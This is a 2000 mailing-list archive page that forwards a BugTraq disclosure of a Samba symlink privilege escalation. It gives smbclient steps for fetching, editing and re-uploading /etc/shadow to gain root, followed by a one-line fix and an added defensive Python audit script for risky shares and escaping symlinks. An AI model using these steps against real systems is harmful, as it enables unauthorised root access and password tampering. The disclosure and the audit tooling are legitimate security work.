BugTraq Post: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz

Scott Gifford sgifford at tir.com
Fri Dec 15 05:54:17 GMT 2000


This was posted to BugTraq earlier today; thought I'd put a copy here
in case anybody hadn't seen it.

I don't think that this "attack" is particularly surprising.
Basically, he is leveraging a Samba "admin user" account into a UNIX
root account, using a symlink (created from a shell) to get outside of
the share.

It seems to me like a "leveraging root to get root" attack, but I
guess if somebody had fileserver admins that were less trusted than
their UNIX admins, it could be an issue.

------ScottG.

From: Tozz <tozz at HACKERS4HACKERS.ORG>
Subject: Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
To: BUGTRAQ at SECURITYFOCUS.COM
Date: Thu, 14 Dec 2000 00:17:51 +0100
Reply-To: Tozz <tozz at HACKERS4HACKERS.ORG>

Symlink attack in (all?) Samba. - Local root walkthrough by Tozz
=================================================================

Requirements:

* Shell access or any other way to create symlinks
* A running samba daemon
* The username and/or password of a user named in the
  admin lists in one or more shares.
* Brains are not required.

By default, Samba (http://www.samba.org) follows symlinks, which can lead to
root compromises. Here is an example:

I have a guy that sorts out all my uploads through SMB; he has 'admin' access
(admin users = username). This means he will work as UID 0 (root).

e.g. we have this share in /etc/smb.conf

[uploads]
 path = /home/ftp/incoming
 comment = Uploads that came through anon ftp
 guest ok = no
 writeable = no
 force create mode = 0755
 force directory mode = 0755
 admin users = warezmaster

Login to the shell, or find some other way to create symlinks
and create a symlink in /home/ftp/incoming
you do something like

ln /etc -s

now type on your box (either local or remote works):
smbclient file://foobar.com/uploads -U warezmaster
it will ask for a password, enter it and you will get something like

smb\:>

There we go

smb\:>cd etc
smb\:>get shadow
smb\:>exit

[root@embrace /root]
now you have downloaded the shadow file onto your local box;
edit it, change your UID to 0, or remove the password
from the root account (no password required at logon)

login with smbclient again

smbclient file://foobar.com/uploads -U warezmaster
enter the password

and reupload

smb\:>cd etc
smb\:>put shadow
smb\:>exit

that's it, now login to the shell; if you changed your own uid
you are now root. If you removed the password from the root account
just su to it and you won't need a password.

Note:

The 'Follow Symlinks' option can be turned off, but it's on by default.


Fix:

Disable Follow Symlinks


Bye,
Tozz (tozz at hackers4hackers.org)

You can contact me on AxeNet (irc.axenet.org, channel #axenet), nickname Tozz,
or MemoServ me when I'm not online.
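An added defender-side audit, not part of either post and not Samba's own tooling: it parses an smb.conf (a constructed sample modelled on the [uploads] share above), reports shares that name admin users while 'follow symlinks' is left at its default of yes, and walks a share directory for symlinks that resolve outside it. The function names, the sample config and the throwaway share built by demo() are my own assumptions.

```python
import configparser, os, tempfile

# Constructed smb.conf modelled on the share in the post (not a real config).
SAMPLE_CONF = """
[uploads]
 path = /home/ftp/incoming
 admin users = warezmaster
[pub]
 path = /srv/pub
 follow symlinks = no
 admin users = warezmaster
"""
def parse_smb_conf(text):
    """Return {share: {key: value}}; keys lower-cased, inner spaces collapsed."""
    cp = configparser.RawConfigParser(strict=False, delimiters=("=",),
                                      comment_prefixes=("#", ";"))
    cp.optionxform = lambda k: " ".join(k.lower().split())
    cp.read_string("\n".join(l.strip() for l in text.splitlines()))
    return {s: dict(cp.items(s)) for s in cp.sections()}
def samba_bool(value, default):
    """Samba accepts yes/no, true/false, 1/0 (case-insensitive)."""
    return default if value is None else value.strip().lower() in ("yes", "true", "1")
def risky_shares(conf):
    """Shares with 'admin users' set and 'follow symlinks' not disabled (default is yes)."""
    glob, out = conf.get("global", {}), []           # per-share keys override [global]
    for name, opts in conf.items():
        if name == "global":
            continue
        admins = opts.get("admin users", glob.get("admin users", "")).strip()
        follow = samba_bool(opts.get("follow symlinks", glob.get("follow symlinks")), True)
        if admins and follow:
            out.append((name, opts.get("path", ""), admins))
    return out
def escaping_symlinks(share_root):
    """Symlinks under share_root whose target resolves outside it."""
    root, found = os.path.realpath(share_root), []
    for dirpath, dirs, files in os.walk(root):       # links are listed, not descended
        for full in (os.path.join(dirpath, e) for e in dirs + files):
            if os.path.islink(full) and os.path.commonpath([root, os.path.realpath(full)]) != root:
                found.append((full, os.readlink(full)))
    return found

def demo():
    """Throwaway share with one escaping symlink (the 'ln /etc -s' case) and one safe one."""
    share = tempfile.mkdtemp()
    os.mkdir(os.path.join(share, "sub"))
    os.symlink("/", os.path.join(share, "etc"))      # resolves outside the share
    os.symlink("sub", os.path.join(share, "inside"))  # stays inside
    return sorted(os.path.basename(l) for l, _ in escaping_symlinks(share))
```

Run risky_shares() over a parsed real smb.conf and escaping_symlinks() over each reported path; a non-empty result is exactly the condition the walkthrough relies on.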





More information about the samba-technical mailing list